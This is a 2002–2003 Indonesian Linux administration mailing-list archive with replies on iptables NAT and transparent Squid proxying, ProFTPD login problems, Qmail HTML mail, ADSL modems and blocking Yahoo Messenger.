At 01:44 PM 4/1/03 +0700, you wrote: Utk setting parameter kernel seperti ini di bbrp system, seperti Red Hat, udah pake sysctl. Coba baca sysctl(8) dan sysctl.conf(5). Yes...betul sekali Om Rony... Ternyata, semua udah ada di /etc/sysctl.conf Jadi lebih gampang lagi. Thanks.. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Transparan Proxy ku aneh
At 09:04 AM 4/1/03 +0700, you wrote: Rekan2 millist maaf lagi, sebelumnya aku sudah kasih tahu kalo Transparan Proxyku sudah run tapi sekarang jadi aneh, pada saat pertama aku coba oke tapi sekarang ngga mau lagi tuh kira2 kenapa yah. Tapi dari artikel yang aku baca di sana di tuliskan bahwa kita harus memastikan sistem kita mendukung IP Forwarding, terus bagaimana caranya kita untuk memastikan bahwa sistem kita mendukung IP Forwarding tersebut. echo "1" > /proc/sys/net/ipv4/ip_forward taruh di /etc/rc.local Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] pro ftpd tidak bisa diakses
At 11:30 AM 3/31/03 +0700, you wrote: ini pesan bila saya run dengan /etc/usr/local/sbin/proftpd -c /usr/local/etc/proftpd.conf Mar 31 11:03:21 alif proftpd[1292] alif.fng.com - /etc/shutmsg present: all incoming connections will be refused. Wah...jangan2x anda menerapkan setting firewall (yg tidak mengijinkan koneksi ke port 21) ? Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Transparan Proxy
At 10:09 AM 3/31/03 +0700, you wrote: Mas Agung sepertinya ada kemajuan nih Linux punya ku. Untuk email bisa connect tapi untuk browsing masih belum bisa kira2 salah dimana lagi yah Mas. Oh iya untuk squidnya apakah di start sebelum atau sesudah transparan atau nggak perlu di pakai. Terimakasih atas responnya. Menurut saya sich sama aja, utk start squid sebelum atau sesudah trasparant. CMIIW Tapi yang jelas SQUID nya HARUS running tho. Kalo blum bisa utk browsing, silahkan cek, apakah benar port SQUID di squid.conf-nya udah sama dengan port yg di redirect (di iptables ?) semoga membantu Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] pro ftpd tidak bisa diakses
At 09:50 AM 3/31/03 +0700, you wrote: Mas agung barusan udah saya tambahin usr dan grup ftp Dan pada proftpd. udah Userftp Groupftp lalu saya run dan tetap tidak bisa diakses (minta user dan password) lalu satya grep hasilnya seperti ini > ps -ax | grep proftpd 1697 ?? Ss 0:00.00 proftpd: (accepting connections) (proftpd) 1704 ?? S 0:00.00 sh -c (ps -ax | grep proftpd) 2>&1 1705 ?? S 0:00.00 sh -c (ps -ax | grep proftpd) 2>&1 1707 ?? R 0:00.00 sh -c (ps -ax | grep proftpd) 2>&1 apakah proftpd saya sudah running ? Udah running mestinya. Anda login sbg user apa ? Coba anda login sbg user biasa bukan "root" dan "anonymous". Langkah bijaknya adalah anda copy and paste-kan pesan log ke sini, ntar kita bahas rame2x dgn temen yg lain. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] pro ftpd tidak bisa diakses
At 08:58 AM 3/31/03 +0700, you wrote: halo linuxer saya punya konfigurasi proftpd seperti di bawah ini dan saya jalankan dengan perintah /usr/local/sbin/proftpd -c /usr/local/etc/proftpd.conf kenafa kok setiap mau akses ke ftpserver muncul dialog untuk ngisi usr dan password ? dan udah saya coba berbagai user dari anonymous sampai root (plus passwordnya) tetap tidak bisa diakses ? Jangan2x FTP-nya blum running ? Bukannya secara default installasi ProFTP TIDAK mengijinkan "Anonymous" dan "root" untuk login ? # Set the user and group that the server normally runs at. Usernobody Groupnogroup Kalo ternyata FTP daemon blum nyala, biasanya user dan group ini blum ada di system anda. Ganti dgn user "ftp" dan group "ftp" (utk mudahnya cek aja di /etc/passwd) CMIIW Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Transparan Proxy
At 08:55 AM 3/31/03 +0700, you wrote: 2. rc.local aku edit sbb : - iptables -A POSTROUTING -j MASQUERADE -t nat -s 192.168.0.3/16 -o eth0 - iptables -A PREROUTING -t nat -j REDIRECT -p tcp -s 192.168.0.3/16 -d 0/0 --dport 80 --to-ports3128 - squid start Komputer aku reboot, nah pada saat aku coba untuk browsing ngga bisa tapi kalo baris ke dua aku remark (baris kedua di item 2) baru bisa browsing. Kalo di rc.local ku seperti ini : # sharing internet cable /sbin/iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE /sbin/iptables -A FORWARD -i eth1 -j ACCEPT #squid tranparancy proxy /sbin/iptables -A PREROUTING -t nat -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080 port SQUID di 8080 Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] microsoft-ds
Ada yg tahu info lebih lanjut ttg microsoft-ds dgn port 445 ? Soalnya, tiap hari portsentry-ku "menangkap" scanning ke port 445 tsb. (sehari bisa bejibun banyaknya). Ini contoh log-nya : 1048800754 - 03/28/2003 04:32:34 Host: tsgw2c3.ericy.com/208.237.135.243 Port: 445 TCP Blocked 1048803781 - 03/28/2003 05:23:01 Host: 62.79.29.38.adsl.hr.worldonline.dk/62.79.29.38 Port: 445 TCP Blocked 1048806276 - 03/28/2003 06:04:36 Host: 218.25.153.252/218.25.153.252 Port: 445 TCP Blocked Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] Email format di Qmail/Sendmail
Salam, Saya buat script sederhana pake PHP utk membuat email format HTML utk notifikasi ke member. (contoh script ada di bawah) Masalahnya adalah, apabila di mesin pake MTA QMail, maka format HTML-nya gak kliatan di Outlook Express (akan muncul code-code tag HTML doang), tapi bila baca emailnya di Eudora, format HTML-nya akan kliatan. Dan apabila saya ganti MTA pake Sendmail, baik di Outlook ataupun Eudora, dapat berhasil dengan baik. Ini salah dimana yach ? - format header - MTA - Mail Reader - $message = 'Todays Info ...'; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "From: Support <[EMAIL PROTECTED]>\r\n"; $headers .= "Bcc: $target\r\n"; mail($to, $subject, $message, $headers); ?> Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [admin] Connection refused di Redhat 8
At 08:51 AM 2/26/03 +0700, you wrote: local connection ? setting firewall default RH, pilih: NO FIREWALL. Lebih baik install firewall sendiri (ipchains, iptables, etc.) daripada yang diberikan oleh RH. Rgds, -Dn- Loh..emang setting Firewall default installasi RH itu bukan pake IPTABLES/IPCHAINS ? Tapi kok di /etc/sysconfig/network-scripts/firewall (atau tepatnya lupa), sintak2xnya mirip IPTABLES command ? Atau, utk mematikan setting firewall default dr installasi RH, saya cukup dgn # service iptables stop Lalu dia me reset (flush) semua chains. Bukannya itu berarti pake IPTABLES/IPCHAINS juga ? CMIIW Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Max Bandwidth
Saya pasang mrtg di Linux getway saya (eth0 ke internet kable). Dan saya dapat data di bawah ini. Apakah berarti bandwidth boleh dibilang (pernah) 400 kbps ? (berarti gede sekali dong..) Maksimum Masuk 415.2 kb/s (4.2%) Rata-rata Masuk 39.4 kb/s (0.4%) Sekarang Masuk 163.0 kb/s (1.6%) Maksimum Keluar 39.6 kb/s (0.4%) Rata-rata Keluar 5656.0 b/s (0.1%) Sekarang Keluar 17.0 kb/s (0.2%) Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Block Port yahoo messenger
At 04:16 PM 1/31/03 +0700, you wrote: benar2 sadis adminnya, mengalahkan kesadisan sumanto :-P percuma diblock, kalo dia pake server jabber+plugin2nya gimana coba ? banyak jalan menuju pulogadung, mending cara yang baik adalah copot keyboard sama mousenya, suruh dia melototin monitor, wong jaman sudah canggih buat komunikasi koq diblock, ingat mas, silaturahim itu penting :-) OOT... wekekek.saya baca tanggapan dari temen2x, saya ketawa sendiri dan bisa menyembuhkan "pusing" saya :) btw, sampai sekarang saya gak berhasil nge-block yahoo messenger, mungkin gak di ridhoi kali yach... anyway, thanks buat semuanya yg telah memberi masukan. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] check speed internet
At 04:08 PM 1/31/03 +0700, you wrote: cuma ide sedikit .. ( Komputer Kita ) --> Gateway+Squid -PARENT--> [Squid HOST-2Mbps/44Mbps (US) ] Trap penggunaan MRTG di host yang 2 Mbps itu.. Saya pernah implementasikan seperti itu, dan ketahuan deh Qos nya si ISP kepada kita. Maksudnya trap itu gimana ? apa saat ./cfgmaker .public@ip_gateway_punya_ISP begitu ? Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Block Port yahoo messenger
At 02:02 PM 1/31/03 +0700, you wrote: # Block YahooMsg /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d csc.yahoo.com -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 204.71.200.36 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 204.71.200.37 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 204.71.201.0/24 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 204.71.202.57 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 204.71.202.120 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 205.188.179.233 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 205.188.7.254 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 216.136.131.93 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 216.136.131.245 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 216.136.172.0/24 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 216.136.226.117 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 216.136.225.12 -j DROP /sbin/iptables -A PREROUTING -t mangle -s 10.0.0.0/8 -d 216.136.225.83 -j DROP [root@firewall root]# iptables -t mangle -L Chain PREROUTING (policy ACCEPT) target prot opt source destination DROP all -- 192.168.0.48 dl3.yahoo.com DROP all -- 192.168.0.48 dl4.yahoo.com DROP all -- 192.168.0.48 UNKNOWN-204-71-201-0.yahoo.com/24 DROP all -- 192.168.0.48 old-p3.msg.yahoo.com DROP all -- 192.168.0.48 UNKNOWN-204-71-202-120.yahoo.com DROP all -- 192.168.0.48 ibucp-vip-d.blue.aol.com DROP all -- 192.168.0.48 205.188.7.254 DROP all -- 192.168.0.48 story1.news.vip.sc5.yahoo.com DROP all -- 192.168.0.48 p10.comp.yahoo.com DROP all -- 192.168.0.48 UNKNOWN-216-136-172-0.yahoo.com/24 DROP all -- 192.168.0.48 cs18.msg.sc5.yahoo.com DROP all -- 192.168.0.48 cs17.msg.yahoo.com DROP all -- 192.168.0.48 cs14.msg.sc5.yahoo.com DROP all -- 192.168.0.48 dl3.yahoo.com DROP all -- 192.168.0.48 dl4.yahoo.com DROP all -- 192.168.0.48 UNKNOWN-204-71-201-0.yahoo.com/24 DROP all -- 192.168.0.48 old-p3.msg.yahoo.com DROP all -- 192.168.0.48 UNKNOWN-204-71-202-120.yahoo.com DROP all -- 192.168.0.48 ibucp-vip-d.blue.aol.com DROP all -- 192.168.0.48 205.188.7.254 DROP all -- 192.168.0.48 story1.news.vip.sc5.yahoo.com DROP all -- 192.168.0.48 p10.comp.yahoo.com DROP all -- 192.168.0.48 UNKNOWN-216-136-172-0.yahoo.com/24 DROP all -- 192.168.0.48 cs18.msg.sc5.yahoo.com DROP all -- 192.168.0.48 cs17.msg.yahoo.com DROP all -- 192.168.0.48 cs14.msg.sc5.yahoo.com DROP all -- 192.168.0.48 dl3.yahoo.com Chain OUTPUT (policy ACCEPT) target prot opt source destination Masih sama juga, si 192.168.0.48 bisa ber-yahoo messenger ria. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re[2]: [admin] Block Port yahoo messenger
At 01:51 PM 1/31/03 +0700, Denie Nataprawira wrote: coba : block *.yahoo.com - pasti OK! - untuk web, install SQUID, jadi bisa untuk web-search doank :) Gimana cara liat *.yahoo.com ? kalo # iptables -I INPUT -s 192.168.0.48 -p tcp -d www.yahoo.com -j DROP hasilnya : Chain INPUT (policy ACCEPT) target prot opt source destination DROP tcp -- 192.168.0.48 w9.dcx.yahoo.com DROP tcp -- 192.168.0.48 w8.dcx.yahoo.com DROP tcp -- 192.168.0.48 w7.dcx.yahoo.com DROP tcp -- 192.168.0.48 w6.dcx.yahoo.com DROP tcp -- 192.168.0.48 w5.dcx.yahoo.com DROP tcp -- 192.168.0.48 w2.dcx.yahoo.com DROP tcp -- 192.168.0.48 w1.dcx.yahoo.com DROP tcp -- 192.168.0.48 www10.dcx.yahoo.com DROP tcp -- 192.168.0.48 www9.dcx.yahoo.com DROP tcp -- 192.168.0.48 www8.dcx.yahoo.com DROP tcp -- 192.168.0.48 www7.dcx.yahoo.com DROP tcp -- 192.168.0.48 w10.dcx.yahoo.com lha ternyata si messenger masih jalan:( Utk mas MkSwap : setting yahoo messenger tidak pake proxy, alias langsung. Jadi mestinya kita bisa cegat di routernya dong... Kebetulan saya pake squid. Yg paling tok cer sich, blok IP-nya. Tapi itu terlalu kejam. btw, emang kenapa sih ngga boleh yahoo! messenger ? logikanya, yahoo diblok - pake MSN, MSN diblok - pake PLASA.COM, PLASA diblok pake FIRSTWAP, dst... semua diblok, bikin pake PHP webchat :) hehehehe... krn...dapet titipan dari HRD, si doi kerjaannya chating doang...:) Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Block Port yahoo messenger
At 01:22 PM 1/31/03 +0700, you wrote: Sebenernya masalah ini dimuat di situsnya yahoo sendiri, secara nggak langsung dia ngasih tau gimana ngebloknya :-p http://help.yahoo.com/help/us/mesg/use/use-17.html If Messenger is unable to find an open port, ask your System Administrator to open port 5050 to our Messenger servers, cs1.yahoo.com, cs2.yahoo.com, and cs3.yahoo.com. # iptables -I INPUT -s 192.168.0.48 -p tcp --dport 5050 -j DROP hasilnya, yahoo messenger tetep jalan. Pusnggg... Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re[2]: [admin] Block Port yahoo messenger
At 01:17 PM 1/31/03 +0700, you wrote: Coba dengan ini mudah2an bisa : #iptables -A INPUT -s 192.168.0.24 -p tcp -d 216.136.0.0/16 -j DROP Sama aja, hasilnya : # iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination DROP tcp -- 192.168.0.48 216-136-0-0.gen.twtelecom.net/16 dan yahoo messenger masih jalan dgn aman. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Block Port yahoo messenger
At 12:03 PM 1/31/03 +0700, you wrote: Blok akses keluar ke port 23 (telnet). Aku baru nyobain, hasilnya yang di blok udah dua hari nggak bisa YM. gak bisa juga tuh mas...;( # iptables -I INPUT -s 192.168.0.48 -p tcp --dport 23 -j DROP maupun # iptables -I OUTPUT -s 192.168.0.48 -p tcp --dport 23 -j DROP Yahoo messenger masih asik-asik ajah. Ada ide lain ? Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Block Port yahoo messenger
Maaf sebelumnya bila udah pernah dibahas. Saya mencoba mem-block user utk tidak dapat ber yahoo messenger dgn : # iptables -A INPUT -s 192.168.0.24 -p tcp -m tcp --dport 6600:7100 -j DROP tapi kok masih jalan aja yach... Ada temen yg tahu, berapa port si yahoo messenger ? Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Quota Domain
Saya memakai QMAIL, vpopmail-5.2 dan qmailadmin 1.0.6 Bagaimanakah cara untuk membatasi quota utk suatu domain ? Misal domain abcd.com hanya punya jatah quota utk email 10M. Terima kasih. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Beda DHCPCd dan BOOTPROTO=dhcp
Salam, Apabila kita pasang NIC dan di konfigure utk menerima IP dari DHCP server, khan kita set di (contoh) /etc/sysconfig/network-scripts/ifcfg-eth0 dgn salah satu option : BOOTPROTO = dhcp Lalu, apa perbedaan dgn DHCPCd, soalnya kalo pake DHCPCd mesti ada file : /etc/dhcpc/dhcpcd-eth0.info Itu saya buktikan, saat konek ke Internet Kable, pada kasus pertama, eth0 gak dapet IP tapi bila pake DHCPC eth0 dapet IP. Ada yg tahu sebabnya ? Terima kasih. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Tentang ADSL
At 02:23 PM 1/20/03 +0700, you wrote: untuk yang punya waktu senggang, tolong beri saya informasi ttg adsl, setting dan configure serta perangkat yang diperlukan. please..please..please..awam nih. Yang diperlukan : Infra struktur : - Line telpon yg udah di migrasi ke ADSL, dalam hal ini anda mesti berkunjung ke Telkom (JANGAN TELPON, krn yg terima telpon biasanya orang yg hanya bisa ngurusin tagihan telpon. SANGAT TIDAK PROFESSIONAL). - Kalo saluran anda udah di migrasi ke ADSL (biasanya ini memakan waktu 2 minggu sejak anda melakukan permohonan migrasi ke ADSL), dan orang TELKOM udah test dan berhasil, anda hubungi ISP utk registrasi ADSL Connection. Hardware. - Anda butuh sebuah modem ADSL, biasanya harganya berkisar USD 160 - 300 Kalo anda ingin Linux sbg gateway, siapkan komputer dan Linux. Tapi bila anda gak mau repot, beli aja modem ADSL yg jadi satu ama router. (harganya USD 300), dan anda tinggal nancepin aja itu kable dari router ke HUB dan go to internet. sbg catatan : kalo anda ingin pake Linux sbg gateway, sebelum anda beli modem ADSL, pastikan modem tsb support dgn Linux anda. Bisa anda tanyakan ke vendor ybs. (utk amannya sich, cari aja modem ADSL yg udah ada NIC support, jadi dari modem ini langsung tancepin ke NIC di Linux). Semoga bermanfaat. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] masih tentang ADSL - Warnet
At 04:41 PM 1/20/03 +0700, you wrote: kalo semua dipasangin ip publik/legal..., apa gak riskan sama securitynya tuh... [cmiiw] Khan ada pairwol ;) Kalo pake router made in pabrik, biasanya ada firewall-nya. Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] masih tentang ADSL - Warnet
At 01:06 PM 1/20/03 +, you wrote: jangan salah persepsi dulu. Yang kencang itu Bandwidth ISPnya. Bukan jalur backbone yang dipakai. Kalau pakai ADSL tapi cuma dapet bandwidthnya 1200bps gimana mau kencang .. hayoo .. intinya sama saja dengan Wireless 11Mbps jalur backbone yang dipakai dari client ke ISP memang kencang, tetapi sayang bandwidthnya paling yang dipakai cuma berkisar antara 128Kbps - 512Kbps.. Sungguh sayang bukan .. Loh..tapi emang cepet kok. Aku udah bandingkan dgn pake Kable Pision, lebih kenceng ADSL. Trus aku nanya orang ISP, katanya 64 kbps. Tapi walau bagaimanapun, tetep ajaMAHAL. Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] masih tentang ADSL - Warnet
At 02:10 PM 1/20/03 +0700, you wrote: gak sulit koq .. ADSL sangat mudah, apalagi kalau ISPnya sanggup diajak kompromi.. client pasangi ip public aja semuanya (: sambungkan ke router .. berez .. gak perlu linux.. Di samping sangat mudah juga sangat TIDAK murah ;) 250 M / bulan, kita harus bayar ke ISP=350 dan Telkom=300. Berarti total 650 (blum termasuk PPn) Menurut pengalaman di kantor saya yg berjumlah 50 karyawan, dalam sehari memakan 300 MB :( Kalo kecepatanemang kereee, tapi bikin bangkrut.:( tetapi kalau mau ada linux ya gak perlu mewah2 koq, cukup Pentium II saja dengan RAM 128 juga sudah oke. Saya pake RedHat 8.0, P II dgn RAM 128, ada Squid juga serta modem pake USB ADSL modem, sudah sangat memuaskan. Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] OOT : Modem ADSL
At 07:52 PM 1/19/03 -0800, you wrote: Dear all, saya mau tanya, modem ADSL yang bagus merk apa ya? Kalo ada yg pake merk ZyXel bagi-bagi dong pengalamannya, soalnya saya direkomendasikan ama providernya pake merk ZyXel. TIA Achmad Saya pake Zyxel P630-41 (USB), tapi utk driver Linux-nya agak susah. Pihak Zyxel sendiri gak mensupport driver for Linux. Kalo mau beli Zyxel P-630 cari seri 41 (P630-41), krn udah ada yg buat driver for linux http://eciadsl.flashtux.org/?lang=en Konfigurasi saya : - RedHat 8.0 - Zyxel P-630-41 USB Tapi emang membutuhkan jiwa ngoprek yg lumayan tinggi :) Semoga berhasil. Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Rubah password postmaster
Salam, Saya pake Qmailadmin+Vpopmail. Saya lupa password utk postmaster. Gimana yach utk merestore password postmaster vpopmail ? Terima kasih. Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Apache :DocumentRoot
At 12:01 PM 1/13/03 +0700, you wrote: Dear Linux'ers Eh rekan2 kalo kita mo buat VirtualHost, apakah DocumentRoot udah nggak dipake' tho Kok di tempat aku padahal sudah di set DocumentRoot nya, larinya tetep ke VirtualHost pertam ayang dia load yach DocumentRoot " /var/www/html" NameVirtualHost * Server Admin ... ServerName abc.domain.com DucumentRoot /usr/local/isoqlog Buat VirtualHost juga utk yg di "/var/www/html" ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Server dengan IP Lokal
At 06:16 PM 12/31/02 +0700, you wrote: sekalian nanya nih . ada nggak HOWTO untuk iptables yang enak dibaca ... http://www.iptables.org/documentation/tutorials/blueflux/iptables-tutorial.html Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] smtp berubah
At 01:17 PM 12/30/02 +0800, you wrote: di gateway pake iptables utk DNAT : #iptables -t nat -A PREROUTING -s ip_client -p tcp --dport 25 -j DNAT --to ip_smtp_server_yg_baru Thanks... Kayaknya ini yg paling enak dipakai. Thanks yach ... btw, gimana buat rule tsb bila kasus : # iptables -t nat -A PREROUTING -s 192.168.0.0/24 -p tcp --dport 25 -j DNAT --to 202.1.1.1 kemudian besoknya saya ganti ke IP 202.2.2.2 di delete dulu, baru buat lagi atau Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] smtp berubah
At 11:53 AM 12/30/02 +0700, you wrote: install mta di gateway, aktifkan smtp servisnya, kemudian di client anda set memakai smtp di gateway tsb. -- Asfihani - UIN 85858803 Thanks sebelumnya. Di gateway tsb udah terinstall Qmail. Tapi waktu delivery yg sangat lambat. Pernah, saya coba kirim email ke luar pake smtp QMAIL, nyampe di tujuan 2 hari sesudahnya. Any ideas ? Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] smtp berubah
Salam. Saya punya 2 koneksi internet dgn ISP yg beda. Gateway pake RH dan Proxy Squid. Masalahnya, bila saya ganti koneksi dari 1 ISP ke ISP yg satu-nya lagi, client kami utk sending email mesti nerubah isian SMTP di mail client mereka. Dan ini sangat tidak praktis. Adakah cara supaya setting di mail client tidak perlu di ubah2x apabila saya ganti ISP ? Terima kasih. Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] service sunrpc
At 12:50 AM 12/26/02 -0700, you wrote: Salam semua, Saya scan sebuah pc dengan menggunakan nmap dan disitu terlihat ada beberapa service yang terbuka diantaranya sunrpc pada port 111 dan kdm pada port 1024. Kedua service tersebut berfungsi untuk apa, dan cara memeatikannya bagaimana ??? Pc nya menggunakan redhat 8.0 Terima kasih PORTMAP cara matiin # service portmap stop jangan lupa matiin aja di start service-nya # chkconfig --del portmap (biar gak start lagi setelah restart Linuxnya) Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Driver for Zyxel P 630-11 for RH
Salam. Ada yg pernah pengalaman install modem USB ADSL Zyxel Prestige 630-11 di Linux ? Saya udah cari di google, dan ketemu site orang Prancis, tapi utk P 630-11 blum di support. Help me ps: saya pake RH 7.2 Terima kasih Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] OOT : Modem ADSL
Salam. Maaf OOT. Kantor saya berencana menggunakan ADSL. Dan saya berencana membuat Linux sbg gateway/router utk modem tsb. Saya minta rekomendasi dari temenx2 yg punya pengalaman mengguanaka ADSL, merk modem yg bagus utk kepentingan tsb. Terima kasih. Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Modem ROUTER to komputer
At 05:46 AM 11/18/02 -0500, you wrote: Saya ada router modem DSL, rencanangya mau saya hubungkan dengan eth1(IP 200.0.0.104) sedangkan eth0(IP 200.0.0.19) saya hubungkan ke HUB dari komputer ini inetrnet sudah bisa ngebrowsing, tetapi dari PC ini saya ping ke PC lain yang ber IP 200.0.0.7 masih dalam satu network,kok tida mau. pesannya seperti ini : CMIIW, kalo udah modem router, mengapa mesti masuk PC lagi ? Bukannya tinggal colokin ke HUB, dan beres. Khan di modem router ada fasilitas NAT nya ? Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Post Installation MySQL dan PostgreSQL
At 03:23 PM 11/14/02 +0700, you wrote: Assalamualaikum wr wb Saya baru selesai instalasi ulang SuSe 8.0 Saya lau membuka manual MySQL dan PostgreSQL yang disertakan. Saya sudah mengikuti semua petunjuk yang ada. MySQL dan PostgreSQL udah bisa jalan sih. TApi saya nggak bisa mengeset password, baik untuk user root maupun user biasa. Jadi semua user bisa masuk ke database tanpa ditanyai password. Selain itu jika dipanggil dengan option -h localhost selalu keluar pesan : "(REJECT connection from @localhost password:NO)" Utk set MySQL password # mysqladmin -u root password paswordnya_apa_terserah Lalu cek dgn : # mysql -u root -p masukkan password yg barusan anda buat. Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Software liat bandwidth
